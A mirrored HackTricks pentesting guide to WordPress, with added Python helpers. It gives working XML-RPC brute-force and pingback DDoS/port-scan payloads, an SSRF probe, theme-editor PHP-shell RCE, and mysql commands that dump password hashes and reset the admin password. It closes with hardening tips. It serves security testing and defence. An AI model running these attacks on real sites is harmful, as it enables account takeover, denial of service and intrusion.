mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-04 02:20:20 +00:00
325 lines
49 KiB
Markdown
# Wordpress

## Basic Information

**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_ (uploads are stored under `wp-content/uploads/<year>/<month>/`).

**Theme files can be found in /wp-content/themes/**, so if you change some PHP of the theme to get RCE you will probably use that path. For example, using the **twentytwelve** theme you can **access** the **404.php** file at [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)

**Another useful url could be:** _/wp-content/themes/default/404.php_

In **wp-config.php** you can find the credentials of the database user WordPress connects with (frequently a privileged account, sometimes root), together with the table prefix and the authentication keys and salts.

Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_

### **Main WordPress Files**

* `index.php`
* `license.txt` and `readme.html` can reveal the installed WordPress version (`readme.html` prints it explicitly; `license.txt` only dates the release through its copyright years).
* `wp-activate.php` is used for the email activation process when setting up a new WordPress site.
* Login paths (they may be renamed to hide them):
  * `/wp-admin/login.php`
  * `/wp-admin/wp-login.php`
  * `/login.php`
  * `/wp-login.php`
* `xmlrpc.php` is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has largely been superseded by the WordPress [REST API](https://developer.wordpress.org/rest-api/reference), but the endpoint is still enabled by default.
* The `wp-content` folder is the main directory where plugins and themes are stored.
* `wp-content/uploads/` is the directory where any files uploaded to the platform are stored.
* `wp-includes/` is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.

#### Post exploitation

* The `wp-config.php` file contains the information WordPress needs to connect to the database (database name, host, username and password), the authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can be useful in troubleshooting.

### Users Permissions

* **Administrator**: full control of the site, including installing plugins and themes and editing their code
* **Editor**: publishes and manages their own and other users' posts
* **Author**: publishes and manages their own posts
* **Contributor**: writes and manages their own posts but cannot publish them
* **Subscriber**: browses posts and edits their own profile

## **Passive Enumeration**

### **Get WordPress version**

Check if you can find the files `/license.txt` or `/readme.html`

Inside the **source code** of the page (example from [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):

* `meta name="generator"` tag

![](../../.gitbook/assets/image%20%28379%29.png)

* CSS link files (the `?ver=` parameter)

![](../../.gitbook/assets/image%20%28377%29.png)

* JavaScript files (the `?ver=` parameter)

![](../../.gitbook/assets/image%20%28376%29.png)

### Get Plugins

```bash
# tr normalises double-quoted attributes so the cut on single quotes works for both styles
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | tr '"' "'" | cut -d "'" -f2
```

### Get Themes

```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | tr '"' "'" | cut -d "'" -f2
```

### Extract versions in general

```bash
# the '?' must be escaped, otherwise grep -E treats it as a quantifier
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '\?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | tr '"' "'" | cut -d "'" -f2
```
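
The same extraction the three pipelines above perform, as an added offline example in Python (this is not code from the HackTricks page): it takes saved HTML, accepts either quote style, pulls plugin and theme slugs together with their `?ver=` values, and falls back to the `?ver=` of `wp-includes` assets when the generator tag has been stripped. `SAMPLE_HTML` and the host `blog.example.com` are constructed for illustration.

```python
"""Added example (not from the HackTricks page): the extraction the curl pipelines
above do, run offline on a saved page with only the standard library."""
import re
from urllib.parse import parse_qs, urlparse

# Constructed fragment of a WordPress front page: a generator tag, one theme
# stylesheet, two plugin assets and a core script, each with a ?ver= query.
SAMPLE_HTML = """
<meta name="generator" content="WordPress 5.8.3" />
<link rel='stylesheet' id='contact-form-7-css' href='https://blog.example.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.3' media='all' />
<link rel="stylesheet" id="twentytwenty-style-css" href="https://blog.example.com/wp-content/themes/twentytwenty/style.css?ver=1.8" media="all" />
<script src='https://blog.example.com/wp-includes/js/wp-embed.min.js?ver=5.8.3'></script>
<script src="https://blog.example.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.1.1"></script>
"""

# href="..." / src='...' with either quote style (the curl version assumed single quotes).
ASSET_URL_RE = re.compile(r"""(?:href|src)=["']([^"']+)["']""")
GENERATOR_RE = re.compile(r"""<meta\s+name=["']generator["']\s+content=["']WordPress\s+([\d.]+)""")


def asset_urls(html: str) -> list:
    """Every href/src value on the page."""
    return ASSET_URL_RE.findall(html)


def generator_version(html: str):
    """Core version from the <meta name="generator"> tag, or None if it was removed."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def components(html: str, kind: str) -> dict:
    """{slug: version} for kind in ('plugins', 'themes'), taken from
    /wp-content/<kind>/<slug>/ paths; version is the ?ver= value of the first
    asset seen for that slug, or None when the site strips it."""
    found = {}
    for url in asset_urls(html):
        m = re.search(rf"/wp-content/{kind}/([^/?#]+)", url)
        if m:
            ver = parse_qs(urlparse(url).query).get("ver", [None])[0]
            found.setdefault(m.group(1), ver)
    return found


def asset_versions(html: str) -> dict:
    """{path: ver} for every asset with a ?ver= parameter."""
    out = {}
    for url in asset_urls(html):
        parsed = urlparse(url)
        ver = parse_qs(parsed.query).get("ver")
        if ver:
            out[parsed.path] = ver[0]
    return out


def core_version_guess(html: str):
    """Prefer the generator tag; otherwise fall back to the ?ver= of a wp-includes
    asset. Core scripts registered without their own version (wp-embed.min.js is
    one) are versioned with the WordPress release, so this is a heuristic: a
    library such as jQuery carries its own version instead."""
    explicit = generator_version(html)
    if explicit:
        return explicit
    for path, ver in asset_versions(html).items():
        if path.startswith("/wp-includes/"):
            return ver
    return None


if __name__ == "__main__":
    print("core:", core_version_guess(SAMPLE_HTML))
    print("plugins:", components(SAMPLE_HTML, "plugins"))
    print("themes:", components(SAMPLE_HTML, "themes"))
```

Feed it the output of `curl -s <url>` instead of `SAMPLE_HTML` against a real target; the plugin slugs are exactly what the active brute force lists in the next section are built from.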

## Active enumeration

### Plugins and Themes

You probably won't be able to find all the plugins and themes passively. In order to discover all of them you will need to **actively brute force a list of plugins and themes** (luckily there are automated tools that contain these lists).

### Users

#### ID Brute

You can get valid users from a WordPress site by brute forcing user IDs:

```bash
curl -s -I -X GET http://blog.example.com/?author=1
```

If the response is **200** or **30X**, the ID is **valid** (with pretty permalinks the redirect points to `/author/<username>/`, so the `Location` header leaks the login name). If the response is **400** or **404**, the ID is **invalid**.

#### wp-json

You can also try to get information about the users by querying:

```bash
curl http://blog.example.com/wp-json/wp/v2/users
```

**Unauthenticated requests only list users who have at least one published post**; the `slug` field is normally the login name.

Also note that _**/wp-json/wp/v2/pages** could leak IP addresses_ (for example, the `guid` field keeps the URL the site had when each page was created, which is sometimes an internal hostname or IP).
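
The two user-enumeration probes above, interpreted offline, as an added example that is not part of the HackTricks page. HTTP is abstracted behind a `fetch` callable so the logic runs without a target; `FAKE_SITE`, `SAMPLE_USERS`, `SAMPLE_DENIED` and the host `blog.example.com` are constructed.

```python
"""Added example (not from the HackTricks page): classify /?author=<id> probes and
parse /wp-json/wp/v2/users. The HTTP layer is injected so this runs offline."""
from __future__ import annotations

import json
import re

AUTHOR_SLUG_RE = re.compile(r"/author/([^/?#]+)")


def classify_author_probe(status: int, location: str | None) -> tuple[str, str | None]:
    """Interpret the answer to GET /?author=<id> (the curl -I probe above).

    200           -> the author archive rendered, so the ID exists
    301/302       -> pretty permalinks redirect to /author/<slug>/; the Location
                     header leaks the login name without any further request
    anything else -> (400/404) no user with that ID
    """
    if 300 <= status < 400 and location:
        m = AUTHOR_SLUG_RE.search(location)
        return "valid", (m.group(1) if m else None)
    if status == 200:
        return "valid", None
    return "invalid", None


def enumerate_author_ids(fetch, max_id: int = 20) -> dict[int, str | None]:
    """fetch(author_id) must return (status, location_header_or_None).
    Returns {id: slug_or_None} for every ID that looks valid."""
    found = {}
    for author_id in range(1, max_id + 1):
        verdict, slug = classify_author_probe(*fetch(author_id))
        if verdict == "valid":
            found[author_id] = slug
    return found


def users_from_wp_json(body: str) -> dict[int, str]:
    """Parse /wp-json/wp/v2/users into {id: slug}. Unauthenticated callers only
    see users with a published post; an error object (dict) yields nothing."""
    data = json.loads(body)
    if isinstance(data, dict):
        return {}
    return {u["id"]: u["slug"] for u in data}


# Constructed responses standing in for a real site.
SAMPLE_USERS = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin",
     "link": "http://blog.example.com/author/admin/"},
    {"id": 7, "name": "Bob Writer", "slug": "bob",
     "link": "http://blog.example.com/author/bob/"},
])
SAMPLE_DENIED = json.dumps({"code": "rest_forbidden",
                            "message": "Sorry, you are not allowed to do that.",
                            "data": {"status": 401}})

# Constructed probe results: IDs 1 and 7 redirect, 2 renders directly, the rest 404.
FAKE_SITE = {
    1: (301, "http://blog.example.com/author/admin/"),
    2: (200, None),
    7: (302, "http://blog.example.com/author/bob/"),
}


def fake_fetch(author_id: int):
    """Stand-in for an HTTP HEAD; swap in a real request against a target."""
    return FAKE_SITE.get(author_id, (404, None))


if __name__ == "__main__":
    print(enumerate_author_ids(fake_fetch, max_id=10))
    print(users_from_wp_json(SAMPLE_USERS))
```

A real `fetch` should send `HEAD /?author=<id>` without following redirects (`curl -I` does exactly that), otherwise the 30X and its `Location` header are consumed before you see them.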

### XML-RPC

If `xmlrpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks against other resources.

To see if it is active, send a POST request to _**/xmlrpc.php**_ with this body:

#### Check

```markup
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```

![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)

#### Credentials Bruteforce

_**wp.getUsersBlogs**_, _**wp.getCategories**_ or _**metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
```

The message _"Incorrect username or password."_ (a `faultCode` of 403) inside a 200 code response should appear if the credentials aren't valid.

Also there is a **faster way** to brute-force credentials using **`system.multicall`**, as you can try several credentials in the same request. Note that since WordPress 4.4 the first failed login inside a multicall makes every remaining login attempt in that request fail, so this amplification only works against old installs.

#### DDoS or port scanning

If you can find the method _**pingback.ping**_ inside the list you can make the WordPress site send an arbitrary request to any host/port.
This can be used to ask **thousands** of WordPress **sites** to **access** one **location** (so a **DDoS** is caused on that location) or you can use it to make **WordPress** **scan** some internal **network** (you can indicate any port).

```markup
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
```

![](../../.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png)

If you get a **faultCode** of **17** ("the source URL does not contain a link to the target"), WordPress managed to connect to that host and port, so the port is open; a faultCode of **0** or **16** ("the source URL does not exist") means the connection failed. Recent versions fetch the source with `wp_safe_remote_get`, which refuses private and loopback addresses, so scanning internal ranges through an up-to-date site usually fails.

Take a look at the use of **`system.multicall`** in the previous section to learn how to pack many pingbacks into one request and cause a DDoS.

### wp-cron.php DoS

This file usually exists under the root of the WordPress site: `/wp-cron.php`
When this file is **accessed** a "**heavy**" MySQL **query** is performed (WordPress looks up and runs any scheduled tasks), so it can be used by **attackers** to **cause** a **DoS**.
Also, by default, `wp-cron.php` is triggered on page loads (whenever a client requests a WordPress page and a task is due), which on high-traffic sites can cause problems (DoS).

It is recommended to disable WP-Cron (`DISABLE_WP_CRON` set to `true` in `wp-config.php`) and create a real cron job on the host that requests `/wp-cron.php` at a regular interval (without causing issues).

#### **Bruteforce**

The same `wp.getUsersBlogs` call described in the XML-RPC section, with the username and password as the two parameters:

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
```

![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)

![](../../.gitbook/assets/image%20%28224%29.png)

Using the correct credentials you can upload a file with `wp.uploadFile`; the response contains the path where it was stored under `wp-content/uploads/` ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)). The usual upload restrictions still apply: the account needs `upload_files`, and a `.php` file is rejected unless it also has `unfiltered_upload` (normally only with `ALLOW_UNFILTERED_UPLOADS`).

```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```

#### DDoS

`pingback.ping` with the victim as the source URL: every WordPress site you send this to will fetch the target once.

```markup
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
```

![](../../.gitbook/assets/image%20%28203%29.png)
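
The XML-RPC requests shown above (the `system.listMethods` check, `wp.getUsersBlogs` brute force, `system.multicall`, `pingback.ping` port scanning and `wp.uploadFile`), built and interpreted offline. This is an added example, not code from HackTricks or WordPress: it uses only the standard library, assumes the caller POSTs the returned bodies to `/xmlrpc.php`, and the `SAMPLE_*` responses are constructed to mirror WordPress's real fault codes (403 for a bad login, 16/17 for pingback).

```python
"""Added example (not from the HackTricks page): build the XML-RPC requests from
the sections above and interpret the responses with xmlrpc.client only."""
import xmlrpc.client as xc


def list_methods_request() -> str:
    """The 'Check' request: system.listMethods with no parameters."""
    return xc.dumps((), methodname="system.listMethods")


def login_request(user: str, password: str) -> str:
    """wp.getUsersBlogs(user, pass): cheap authenticated call used for brute force."""
    return xc.dumps((user, password), methodname="wp.getUsersBlogs")


def multicall_login_request(creds) -> str:
    """Many wp.getUsersBlogs attempts packed into one system.multicall request."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [u, p]} for u, p in creds]
    return xc.dumps((calls,), methodname="system.multicall")


def pingback_request(source_url: str, target_post: str) -> str:
    """pingback.ping(source, target): WordPress fetches `source` looking for a link."""
    return xc.dumps((source_url, target_post), methodname="pingback.ping")


def upload_request(user: str, password: str, name: str, mime: str, data: bytes) -> str:
    """wp.uploadFile(blog_id, user, pass, {name, type, bits}); bits is base64."""
    payload = {"name": name, "type": mime, "bits": xc.Binary(data)}
    return xc.dumps((1, user, password, payload), methodname="wp.uploadFile")


def decode_request(body: str):
    """Turn a request we built (or captured) back into (methodName, params)."""
    params, method = xc.loads(body)
    return method, params


def parse_response(body: str):
    """Return ("ok", value) or ("fault", faultCode, faultString)."""
    try:
        (value,), _ = xc.loads(body)
        return ("ok", value)
    except xc.Fault as fault:
        return ("fault", fault.faultCode, fault.faultString)


def has_method(body: str, name: str) -> bool:
    """Is `name` in the system.listMethods answer?"""
    result = parse_response(body)
    return result[0] == "ok" and name in result[1]


def login_ok(body: str) -> bool:
    """A wrong password is a faultCode 403 'Incorrect username or password.'"""
    return parse_response(body)[0] == "ok"


def multicall_valid(body: str, creds) -> list:
    """Each multicall entry is either [result] or a fault struct; map back to creds."""
    status, results = parse_response(body)[:2]
    if status != "ok":
        return []
    return [pair for pair, r in zip(creds, results)
            if not (isinstance(r, dict) and "faultCode" in r)]


def pingback_port_open(body: str) -> bool:
    """17 = source fetched but no link to target (TCP connect worked);
    0 or 16 = 'source URL does not exist' (could not connect)."""
    result = parse_response(body)
    return result[0] == "fault" and result[1] == 17


# Constructed sample responses in WordPress's shape.
SAMPLE_METHODS = xc.dumps((["system.multicall", "pingback.ping", "wp.getUsersBlogs"],),
                          methodresponse=True)
SAMPLE_BAD_LOGIN = xc.dumps(xc.Fault(403, "Incorrect username or password."))
BLOG = {"isAdmin": True, "blogid": "1", "blogName": "blog",
        "url": "http://blog.example.com/", "xmlrpc": "http://blog.example.com/xmlrpc.php"}
CREDS = [("admin", "admin"), ("admin", "Summer2024!"), ("editor", "password")]
SAMPLE_MULTICALL = xc.dumps(([
    {"faultCode": 403, "faultString": "Incorrect username or password."},
    [[BLOG]],  # the second pair logged in
    {"faultCode": 403, "faultString": "Incorrect username or password."},
],), methodresponse=True)
SAMPLE_PORT_OPEN = xc.dumps(xc.Fault(17, "The source URL does not contain a link to the target URL."))
SAMPLE_PORT_CLOSED = xc.dumps(xc.Fault(16, "The source URL does not exist."))

if __name__ == "__main__":
    print(multicall_login_request(CREDS))
    print("valid:", multicall_valid(SAMPLE_MULTICALL, CREDS))
    print("port open:", pingback_port_open(SAMPLE_PORT_OPEN))
```

Send each body with `Content-Type: text/xml`; a plain `GET /xmlrpc.php` only returns "XML-RPC server accepts POST requests only", which by itself already confirms the endpoint is live.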

### /wp-json/oembed/1.0/proxy - SSRF

Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ and the WordPress site may make a request to you. The proxy endpoint requires an account with `edit_posts`, so an unauthenticated request normally gets a `rest_forbidden` error instead.

This is the response when it doesn't work:

![](../../.gitbook/assets/image%20%28127%29.png)

### SSRF

{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}

This tool checks whether the **pingback.ping** method and the **/wp-json/oembed/1.0/proxy** path exist, and if they do it tries to exploit them.

### Automatic Tools

```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua --enumerate --url http://www.domain.com --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force the found users and search for vulnerabilities using a free API token (up to 50 searches)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```

## **Panel RCE**

#### **Modifying a php from the theme used (admin credentials needed)**

Appearance → Editor → 404 Template (at the right)

Change the content for a PHP shell:

![](../../.gitbook/assets/image%20%28125%29.png)

Search the internet for how that template is reached. In this case you have to access: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)

The theme editor is unavailable when `DISALLOW_FILE_EDIT` is set in `wp-config.php`; with the same privileges you can instead upload a plugin zip containing the shell (Plugins → Add New → Upload Plugin), which is also what the Metasploit module below does.

### MSF

You can use:

```text
use exploit/unix/webapp/wp_admin_shell_upload
```

to get a session (the module logs in with the admin credentials, uploads a malicious plugin and triggers it).
## Post Exploitation
|
|
|
|
Extract usernames and passwords:
|
|
|
|
```bash
|
|
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
|
|
```
|
|
|
|
Change admin password:
|
|
|
|
```bash
|
|
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
|
|
```

## WordPress Protection

### Regular Updates

Make sure WordPress, plugins, and themes are up to date. Also confirm that automatic updating is enabled: the `define` goes in `wp-config.php`, while the two `add_filter` calls belong in a plugin or the theme's `functions.php` (the filter API is not loaded yet when `wp-config.php` runs):

```php
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```

Also, **only install trustable WordPress plugins and themes**.

### Security Plugins

* [**Wordfence Security**](https://wordpress.org/plugins/wordfence/)
* [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
* [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)

### **Other Recommendations**

* Remove or rename the default **admin** user
* Use **strong passwords** and **2FA**
* Periodically **review** user **permissions**
* **Limit login attempts** to prevent brute force attacks
* Restrict **`wp-login.php`** and the **`/wp-admin/`** directory to internal access or a set of allowed IP addresses (and consider renaming the login URL)
* Disable **`xmlrpc.php`** if it is not needed and set **`DISALLOW_FILE_EDIT`** so a compromised admin account cannot edit theme or plugin code from the panel